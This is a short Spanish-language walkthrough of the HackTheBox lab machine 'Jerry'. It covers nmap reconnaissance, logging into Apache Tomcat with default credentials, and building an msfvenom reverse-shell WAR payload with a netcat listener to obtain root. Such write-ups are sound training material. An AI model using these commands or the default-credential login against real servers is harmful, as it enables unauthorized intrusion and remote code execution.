Jerry

✍️ Autor: mrh4sh 🔍 Dificultad: Fácil 📅 Fecha de creación: 30/06/2018

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.10.95

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sC -sV 10.10.10.95

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Durante el escaneo se identificaron los siguientes puertos abiertos:

  • Puerto 8080 (HTTP): Se ha detectado un servidor web Apache Tomcat con la versión 7.0.88 en ejecución. Esta versión puede contener vulnerabilidades conocidas, por lo que se recomienda verificar exploits públicos relacionados.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p8080 -v 10.10.10.95

para que nos proporcione más información sobre esos puertos específicamente.

Revisando el puerto 8080 nos encontramos con un Apache Tomcat por lo que nos intentamos loguear con las credenciales por defecto.

Nos logueamos con admin:admin.

Nos salen unas credenciales para loguearnos.

🚀 EXPLOTACIÓN

Vemos que podemos subir archivos por lo que creamos uno malicioso.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 -f war -o reverse2.war

Nos ponemos en escucha.

nc -nlvp 443

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

somos root.

Last updated

Was this helpful?